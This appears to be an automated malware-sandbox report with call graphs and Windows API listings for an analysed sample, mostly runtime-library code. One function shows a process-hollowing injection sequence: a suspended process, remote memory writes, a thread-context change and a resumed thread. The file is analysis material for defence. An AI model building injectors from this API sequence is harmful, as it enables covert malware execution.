15763 452d3c 15762->15763 15765 452336 __EH_prolog3 15764->15765 15766 453aa8 std::_Lockit::_Lockit 7 API calls 15765->15766 15767 452343 15766->15767 15768 452377 15767->15768 15769 45238c 15767->15769 15796 453d89 15768->15796 15805 453a36 15769->15805 15773 452380 std::ios_base::_Init 15773->15755 15852 453e9e 15776->15852 15882 453dd4 15779->15882 15782 452541 15783 452554 15782->15783 15785 45a6c6 ___std_exception_copy 14 API calls 15782->15785 15786 452565 15783->15786 15787 45a6c6 ___std_exception_copy 14 API calls 15783->15787 15784 45a6c6 ___std_exception_copy 14 API calls 15784->15782 15785->15783 15788 452576 15786->15788 15789 45a6c6 ___std_exception_copy 14 API calls 15786->15789 15787->15786 15790 452587 15788->15790 15791 45a6c6 ___std_exception_copy 14 API calls 15788->15791 15789->15788 15792 45a6c6 ___std_exception_copy 14 API calls 15790->15792 15794 452598 15790->15794 15791->15790 15792->15794 15793 453b00 std::_Lockit::~_Lockit 2 API calls 15795 4525a3 15793->15795 15794->15793 15795->15748 15810 45a9f8 15796->15810 15799 453be3 _Yarn 15 API calls 15800 453dad 15799->15800 15801 453dbd 15800->15801 15802 45a9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 15800->15802 15803 453be3 _Yarn 15 API calls 15801->15803 15802->15801 15804 453dd1 15803->15804 15804->15773 15849 4539f7 15805->15849 15808 455ad1 Concurrency::cancel_current_task RaiseException 15809 453a55 15808->15809 15811 45f58b std::_Locinfo::_Locinfo_dtor 5 API calls 15810->15811 15812 45aa05 15811->15812 15815 45a7a3 15812->15815 15816 45a7af __FrameHandler3::FrameUnwindToState 15815->15816 15823 45a722 EnterCriticalSection 15816->15823 15818 45a7bd 15824 45a7fe 15818->15824 15823->15818 15825 45a95d std::_Locinfo::_Locinfo_dtor 69 API calls 15824->15825 15826 45a819 15825->15826 15827 45eb00 __Getctype 41 API calls 15826->15827 15845 45a7ca 15826->15845 15828 45a826 15827->15828 15829 46252c std::_Locinfo::_Locinfo_dtor 43 API calls 15828->15829 15830 45a84b 15829->15830 15831 45a852 15830->15831 15832 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 15830->15832 15834 459034 __Getctype 11 API calls 15831->15834 15831->15845 15833 45a877 15832->15833 15836 46252c std::_Locinfo::_Locinfo_dtor 43 API calls 15833->15836 15833->15845 15835 45a95c 15834->15835 15837 45a893 15836->15837 15838 45a8b5 15837->15838 15839 45a89a 15837->15839 15842 45ee48 ___free_lconv_mon 14 API calls 15838->15842 15843 45a8e0 15838->15843 15839->15831 15840 45a8ac 15839->15840 15841 45ee48 ___free_lconv_mon 14 API calls 15840->15841 15841->15845 15842->15843 15844 45ee48 ___free_lconv_mon 14 API calls 15843->15844 15843->15845 15844->15845 15846 45a7f2 15845->15846 15847 45a76a std::_Lockit::~_Lockit LeaveCriticalSection 15846->15847 15848 453d95 15847->15848 15848->15799 15850 4510d0 std::exception::exception 42 API calls 15849->15850 15851 453a09 15850->15851 15851->15808 15853 45ab94 __Getctype 41 API calls 15852->15853 15854 453ea7 __Getctype 15853->15854 15855 453ec1 15854->15855 15856 453edf 15854->15856 15857 45aa30 __Getctype 41 API calls 15855->15857 15858 45aa30 __Getctype 41 API calls 15856->15858 15859 453ec8 15857->15859 15858->15859 15860 45abb9 __Getctype 41 API calls 15859->15860 15861 453ef0 15860->15861 15863 4522d7 15861->15863 15864 45b048 15861->15864 15863->15751 15865 45b055 15864->15865 15866 45b090 15864->15866 15867 45a798 ___std_exception_copy 15 API calls 15865->15867 15866->15863 15868 45b078 15867->15868 15868->15866 15873 462cc8 15868->15873 15871 459034 __Getctype 11 API calls 15872 45b0a6 15871->15872 15874 462cd6 15873->15874 15875 462ce4 15873->15875 15874->15875 15880 462cfe 15874->15880 15876 45b188 __strnicoll 14 API calls 15875->15876 15877 462cee 15876->15877 15878 459007 __strnicoll 41 API calls 15877->15878 15879 45b089 15878->15879 15879->15866 15879->15871 15880->15879 15881 45b188 __strnicoll 14 API calls 15880->15881 15881->15877 15883 453de0 15882->15883 15884 452532 15882->15884 15885 45a9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 15883->15885 15884->15782 15884->15784 15885->15884 17572 45c718 17575 45c3e4 17572->17575 17576 45c3f0 __FrameHandler3::FrameUnwindToState 17575->17576 17583 45a722 EnterCriticalSection 17576->17583 17578 45c428 17584 45c446 17578->17584 17580 45c3fa 17580->17578 17582 46676b __Getctype 14 API calls 17580->17582 17582->17580 17583->17580 17587 45a76a LeaveCriticalSection 17584->17587 17586 45c434 17587->17586 17671 45e9c7 17672 45e9d2 17671->17672 17676 45e9e2 17671->17676 17677 45e9e8 17672->17677 17675 45ee48 ___free_lconv_mon 14 API calls 17675->17676 17678 45ea03 17677->17678 17679 45e9fd 17677->17679 17681 45ee48 ___free_lconv_mon 14 API calls 17678->17681 17680 45ee48 ___free_lconv_mon 14 API calls 17679->17680 17680->17678 17682 45ea0f 17681->17682 17683 45ee48 ___free_lconv_mon 14 API calls 17682->17683 17684 45ea1a 17683->17684 17685 45ee48 ___free_lconv_mon 14 API calls 17684->17685 17686 45ea25 17685->17686 17687 45ee48 ___free_lconv_mon 14 API calls 17686->17687 17688 45ea30 17687->17688 17689 45ee48 ___free_lconv_mon 14 API calls 17688->17689 17690 45ea3b 17689->17690 17691 45ee48 ___free_lconv_mon 14 API calls 17690->17691 17692 45ea46 17691->17692 17693 45ee48 ___free_lconv_mon 14 API calls 17692->17693 17694 45ea51 17693->17694 17695 45ee48 ___free_lconv_mon 14 API calls 17694->17695 17696 45ea5c 17695->17696 17697 45ee48 ___free_lconv_mon 14 API calls 17696->17697 17698 45ea6a 17697->17698 17703 45e814 17698->17703 17704 45e820 __FrameHandler3::FrameUnwindToState 17703->17704 17719 45a722 EnterCriticalSection 17704->17719 17706 45e82a 17709 45ee48 ___free_lconv_mon 14 API calls 17706->17709 17710 45e854 17706->17710 17709->17710 17720 45e873 17710->17720 17711 45e87f 17712 45e88b __FrameHandler3::FrameUnwindToState 17711->17712 17724 45a722 EnterCriticalSection 17712->17724 17714 45e895 17715 45eab5 __dosmaperr 14 API calls 17714->17715 17716 45e8a8 17715->17716 17725 45e8c8 17716->17725 17719->17706 17723 45a76a LeaveCriticalSection 17720->17723 17722 45e861 17722->17711 17723->17722 17724->17714 17728 45a76a LeaveCriticalSection 17725->17728 17727 45e8b6 17727->17675 17728->17727 14913 5c018d 14914 5c01c5 14913->14914 14915 5c02d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 14914->14915 14918 5c0392 TerminateProcess 14914->14918 14915->14914 14916 5c03a2 WriteProcessMemory 14915->14916 14917 5c03e7 14916->14917 14919 5c03ec WriteProcessMemory 14917->14919 14920 5c0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 14917->14920 14918->14915 14919->14917

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005C02FC
                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005C030F
                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 005C032D
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005C0351
                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 005C037C
                                            • TerminateProcess.KERNELBASE(?,00000000), ref: 005C039B
                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 005C03D4
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 005C041F
                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005C045D
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 005C0499
                                            • ResumeThread.KERNELBASE(?), ref: 005C04A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2294061621.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5c0000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Similarity
                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                            • String ID: GetP$Load$aryA$ress
                                            • API String ID: 2440066154-977067982
                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                            • Instruction ID: c6511193033833b2758bfe1f146d1e29458629080701035a2653d53c4bcc40c6
                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                            • Instruction Fuzzy Hash: B1B1E77664024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0045172B: __EH_prolog3_catch.LIBCMT ref: 00451732
                                              • Part of subcall function 0045172B: _strlen.LIBCMT ref: 0045174A
                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0046C234
                                              • Part of subcall function 004515B7: _strlen.LIBCMT ref: 004515CF
                                            • _strlen.LIBCMT ref: 0046C24F
                                            • _strlen.LIBCMT ref: 0046C265
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0046C282
                                            • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 0046C2A0
                                              • Part of subcall function 0046C000: _Deallocate.LIBCONCRT ref: 0046C097
                                              • Part of subcall function 0046C0A0: _Deallocate.LIBCONCRT ref: 0046C1CB
                                            • CreateThread.KERNELBASE(00000000,00000000,00000188,00477AC0,00000000,00000000), ref: 0046C2D1
                                            • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 0046C2DB
                                              • Part of subcall function 00451644: _Deallocate.LIBCONCRT ref: 00451653
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strlen$Deallocate$AddressAllocCreateH_prolog3_catchHandleModuleObjectProcSingleThreadVirtualWait
                                            • String ID: Cons$Free$kernel32.dll$ole
                                            • API String ID: 2500176202-3464035140
                                            • Opcode ID: 6855e11d027cf0bba0e1bf26b19a21c09a644185c2d14fb6cf356a8834060d14
                                            • Instruction ID: 7122ba4ee418dfd4b7e37d639d2dbe8b76357c4fe12b65aa477eddb195cba1fe
                                            • Opcode Fuzzy Hash: 6855e11d027cf0bba0e1bf26b19a21c09a644185c2d14fb6cf356a8834060d14
                                            • Instruction Fuzzy Hash: 19218371E00208BED710ABB1DC86EBF777CEB4571DB20402EF815A6192EE7C9D05862D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 46 45f058-45f064 47 45f0f6-45f0f9 46->47 48 45f0ff 47->48 49 45f069-45f07a 47->49 50 45f101-45f105 48->50 51 45f087-45f0a0 LoadLibraryExW 49->51 52 45f07c-45f07f 49->52 53 45f106-45f116 51->53 54 45f0a2-45f0ab GetLastError 51->54 55 45f085 52->55 56 45f11f-45f121 52->56 53->56 59 45f118-45f119 FreeLibrary 53->59 57 45f0e4-45f0f1 54->57 58 45f0ad-45f0bf call 45e788 54->58 60 45f0f3 55->60 56->50 57->60 58->57 63 45f0c1-45f0d3 call 45e788 58->63 59->56 60->47 63->57 66 45f0d5-45f0e2 LoadLibraryExW 63->66 66->53 66->57
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,0045F165,?,?,00000000,00000000,?,?,0045F38F,00000021,FlsSetValue,004702C0,004702C8,00000000), ref: 0045F119
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: ea5162e4640b55f1ca6d438d1487774fe6f65b88c27429995a0458b822307b09
                                            • Instruction ID: ef2179fe8526bfc4882fb0e196c7cc8a659829a1a131601e14049adf9d2fb175
                                            • Opcode Fuzzy Hash: ea5162e4640b55f1ca6d438d1487774fe6f65b88c27429995a0458b822307b09
                                            • Instruction Fuzzy Hash: 7D210875E00510EBD7219B25DC40A5B3758AF01B65F280132ED06A73D3E778ED0DC6DA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 67 462a91-462aaa 68 462ac0-462ac5 67->68 69 462aac-462abc call 45b34b 67->69 71 462ac7-462ad1 68->71 72 462ad4-462afa call 463c28 68->72 69->68 76 462abe 69->76 71->72 77 462b00-462b0b 72->77 78 462c6d-462c7e call 454791 72->78 76->68 79 462c60 77->79 80 462b11-462b16 77->80 84 462c62 79->84 82 462b2b-462b36 call 461e71 80->82 83 462b18-462b21 call 454b20 80->83 93 462b41-462b45 82->93 94 462b38 82->94 92 462b23-462b29 83->92 83->93 88 462c64-462c6b call 454522 84->88 88->78 96 462b3e 92->96 93->84 97 462b4b-462b62 call 463c28 93->97 94->96 96->93 97->84 100 462b68-462b7a call 45f4f2 97->100 102 462b7f-462b83 100->102 103 462b85-462b8d 102->103 104 462b9e-462ba0 102->104 105 462bc7-462bd3 103->105 106 462b8f-462b94 103->106 104->84 109 462bd5-462bd7 105->109 110 462c52 105->110 107 462c46-462c48 106->107 108 462b9a-462b9c 106->108 107->88 108->104 112 462ba5-462bbf call 45f4f2 108->112 113 462bec-462bf7 call 461e71 109->113 114 462bd9-462be2 call 454b20 109->114 111 462c54-462c5b call 454522 110->111 111->104 112->107 125 462bc5 112->125 113->111 124 462bf9 113->124 114->111 123 462be4-462bea 114->123 126 462bff-462c04 123->126 124->126 125->104 126->111 127 462c06-462c1e call 45f4f2 126->127 127->111 130 462c20-462c27 127->130 131 462c4a-462c50 130->131 132 462c29-462c2a 130->132 133 462c2b-462c3d call 463ca4 131->133 132->133 133->111 136 462c3f-462c45 call 454522 133->136 136->107
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00462B18
                                            • __alloca_probe_16.LIBCMT ref: 00462BD9
                                            • __freea.LIBCMT ref: 00462C40
                                              • Part of subcall function 00461E71: HeapAlloc.KERNEL32(00000000,00000000,?,?,00455315,?,?,?,?,?,004510FC,?,00000001), ref: 00461EA3
                                            • __freea.LIBCMT ref: 00462C55
                                            • __freea.LIBCMT ref: 00462C65
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                            • String ID:
                                            • API String ID: 1096550386-0
                                            • Opcode ID: 114d685e79689276a0757d17a1a342e534d0dd39d43611e1cf1f63e0a731b1bd
                                            • Instruction ID: 6a01f291c2a04a43a1f280d467372104f5a167fb2572d2d1795f7c305e0d0e15
                                            • Opcode Fuzzy Hash: 114d685e79689276a0757d17a1a342e534d0dd39d43611e1cf1f63e0a731b1bd
                                            • Instruction Fuzzy Hash: 1D51D372600606BBEB249F658D81EBF37A9EF44714B14012AFD08E6211F6B8DD54C76A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 139 45f4f2-45f501 call 45f024 142 45f503-45f528 LCMapStringEx 139->142 143 45f52a-45f544 call 45f54f LCMapStringW 139->143 147 45f54a-45f54c 142->147 143->147
                                            APIs
                                            • LCMapStringEx.KERNELBASE(?,00462B7F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0045F526
                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00462B7F,?,?,00000000,?,00000000), ref: 0045F544
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: String
                                            • String ID: |,E
                                            • API String ID: 2568140703-2637010583
                                            • Opcode ID: 37a5f502551e90a9180730c015ae2419abab4551d247ab847bdec6605ca84fe9
                                            • Instruction ID: 503b30b60f521d7d7babb61f469797ae18918887f3abfe79a8d230603ff30460
                                            • Opcode Fuzzy Hash: 37a5f502551e90a9180730c015ae2419abab4551d247ab847bdec6605ca84fe9
                                            • Instruction Fuzzy Hash: 06F0B83240011ABBCF125F91DC049DE3F66FB48761F048021FE1826022D636C936AB9A

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,0045C153,00000016,00458E0A,?,?,FC3EAC19,00458E0A,?), ref: 0045C16A
                                            • TerminateProcess.KERNEL32(00000000,?,0045C153,00000016,00458E0A,?,?,FC3EAC19,00458E0A,?), ref: 0045C171
                                            • ExitProcess.KERNEL32 ref: 0045C183
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: cecf275b72850c49d3e140ac768fce790f21e9652a47ded847fd5488ea7220ea
                                            • Instruction ID: b0f9bd52925c7d001ab30f3aaeb09df794c8a3b34e0d9e0e35d801db6756b4f1
                                            • Opcode Fuzzy Hash: cecf275b72850c49d3e140ac768fce790f21e9652a47ded847fd5488ea7220ea
                                            • Instruction Fuzzy Hash: 10D06731904644AFCF012F62DC499593F26AE4138AF444025FD099A133DB7A99569A99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 155 464daf-464dd7 call 4648df 158 464f9f-464fa0 call 464950 155->158 159 464ddd-464de3 155->159 162 464fa5-464fa7 158->162 161 464de6-464dec 159->161 163 464df2-464dfe 161->163 164 464eee-464f0d call 455f00 161->164 166 464fa8-464fb6 call 454791 162->166 163->161 167 464e00-464e06 163->167 173 464f10-464f15 164->173 170 464ee6-464ee9 167->170 171 464e0c-464e18 IsValidCodePage 167->171 170->166 171->170 172 464e1e-464e25 171->172 175 464e27-464e33 172->175 176 464e4d-464e5a GetCPInfo 172->176 177 464f17-464f1c 173->177 178 464f52-464f5c 173->178 179 464e37-464e43 call 4649b3 175->179 181 464e5c-464e7b call 455f00 176->181 182 464eda-464ee0 176->182 183 464f1e-464f26 177->183 184 464f4f 177->184 178->173 180 464f5e-464f88 call 4648a1 178->180 190 464e48 179->190 194 464f89-464f98 180->194 181->179 195 464e7d-464e84 181->195 182->158 182->170 188 464f47-464f4d 183->188 189 464f28-464f2b 183->189 184->178 188->177 188->184 193 464f2d-464f33 189->193 190->162 193->188 196 464f35-464f45 193->196 194->194 197 464f9a 194->197 198 464e86-464e8b 195->198 199 464eb0-464eb3 195->199 196->188 196->193 197->158 198->199 201 464e8d-464e95 198->201 200 464eb8-464ebf 199->200 200->200 202 464ec1-464ed5 call 4648a1 200->202 203 464e97-464e9e 201->203 204 464ea8-464eae 201->204 202->179 206 464e9f-464ea6 203->206 204->198 204->199 206->204 206->206
                                            APIs
                                              • Part of subcall function 004648DF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0046490A
                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00464BF6,?,00000000,?,00000000,?), ref: 00464E10
                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00464BF6,?,00000000,?,00000000,?), ref: 00464E52
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValid
                                            • String ID:
                                            • API String ID: 546120528-0
                                            • Opcode ID: 6b023124c19f3746ac2f3623ce50f5df1cca3d0007a69ce93fee4c240893be81
                                            • Instruction ID: 54394c131aecea807d88033306801a901456fd512818dc6516776a8eb00ad076
                                            • Opcode Fuzzy Hash: 6b023124c19f3746ac2f3623ce50f5df1cca3d0007a69ce93fee4c240893be81
                                            • Instruction Fuzzy Hash: 6D5101B1A002459EDF24DF75C8406ABBBE5FFC1304F14406FD1868B252F7799946CB9A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 216 4649b3-4649d5 217 464aee-464b14 216->217 218 4649db-4649ed GetCPInfo 216->218 220 464b19-464b1e 217->220 218->217 219 4649f3-4649fa 218->219 221 4649fc-464a06 219->221 222 464b20-464b26 220->222 223 464b28-464b2e 220->223 221->221 226 464a08-464a1b 221->226 227 464b36-464b38 222->227 224 464b30-464b33 223->224 225 464b3a 223->225 224->227 228 464b3c-464b4e 225->228 229 464a3c-464a3e 226->229 227->228 228->220 230 464b50-464b5e call 454791 228->230 231 464a40-464a77 call 462988 call 462c7f 229->231 232 464a1d-464a24 229->232 242 464a7c-464ab1 call 462c7f 231->242 234 464a33-464a35 232->234 238 464a26-464a28 234->238 239 464a37-464a3a 234->239 238->239 241 464a2a-464a32 238->241 239->229 241->234 245 464ab3-464abd 242->245 246 464abf-464ac9 245->246 247 464acb-464acd 245->247 248 464add-464aea 246->248 249 464acf-464ad9 247->249 250 464adb 247->250 248->245 251 464aec 248->251 249->248 250->248 251->230
                                            APIs
                                            • GetCPInfo.KERNEL32(E8458D00,?,00464C02,00464BF6,00000000), ref: 004649E5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Info
                                            • String ID:
                                            • API String ID: 1807457897-0
                                            • Opcode ID: 0eeb079d1dc1ffaab4d5d325efcc6fcd0f338d6c411ae19d3cb3a659aba79f31
                                            • Instruction ID: c3fac6f88253d922bcd747bb99d8ad34ace7fe97ae1e9a550fc61f448ea75f4d
                                            • Opcode Fuzzy Hash: 0eeb079d1dc1ffaab4d5d325efcc6fcd0f338d6c411ae19d3cb3a659aba79f31
                                            • Instruction Fuzzy Hash: 65518E71504158AFCF218E68CD80BE77BB8EB96304F2401EED499C7142E338AD46CF2A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 45f123-45f14b 253 45f151-45f153 252->253 254 45f14d-45f14f 252->254 256 45f155-45f157 253->256 257 45f159-45f160 call 45f058 253->257 255 45f1a2-45f1a5 254->255 256->255 259 45f165-45f169 257->259 260 45f188-45f19f 259->260 261 45f16b-45f179 GetProcAddress 259->261 263 45f1a1 260->263 261->260 262 45f17b-45f186 call 45b8da 261->262 262->263 263->255
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e599b35b0943ce1a7013574b399f53967c48c1d1569ba140dc6c9fd60d523936
                                            • Instruction ID: 3673bc4377492dffc6c22e0da0e0fafa25252d2defec10f8ff60690f7427fca8
                                            • Opcode Fuzzy Hash: e599b35b0943ce1a7013574b399f53967c48c1d1569ba140dc6c9fd60d523936
                                            • Instruction Fuzzy Hash: 6A014933740510DF9B118E6AEC4095B3397BBC53217544132FD04DB286DA38DC4D878A
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(?,2000000B,dyF,00000002,00000000,?,?,?,00467964,?,00000000), ref: 004676DF
                                            • GetLocaleInfoW.KERNEL32(?,20001004,dyF,00000002,00000000,?,?,?,00467964,?,00000000), ref: 00467708
                                            • GetACP.KERNEL32(?,?,00467964,?,00000000), ref: 0046771D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
